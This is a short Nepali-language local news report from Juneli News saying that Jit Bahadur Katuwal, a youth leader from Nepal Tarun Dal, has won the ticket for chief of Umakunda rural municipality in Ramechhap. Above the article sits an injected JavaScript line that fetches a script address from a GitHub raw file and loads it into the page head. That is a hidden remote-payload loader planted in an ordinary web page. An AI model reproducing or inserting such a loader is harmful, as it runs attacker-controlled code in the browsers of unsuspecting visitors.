;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, रामेछाप |
स्थानीय चुनाबको लागि रामेछाप उमाकुण्ड गाउँपालिका प्रमुखको टिकेट जित बहादुर कटुवालले हात परेका छन् | कटुवाल युवा नेता तथा समाजसेवी समेत रहेका छन् |
नेपाल तरुण दलमा लामो समय काम गरेका कटुवालले जितको लागि दिनरात खटेर लाग्ने जुनेली न्युजलाई बताए |
जनताको लागि काम गरेर उमाकुण्ड गाउँपालिकालाइ देशकै उत्कृस्ट गाउपालिका बनाउने समपना रहेको उनको भनाइ छ |
फेसबुक प्रतिक्रियाहरु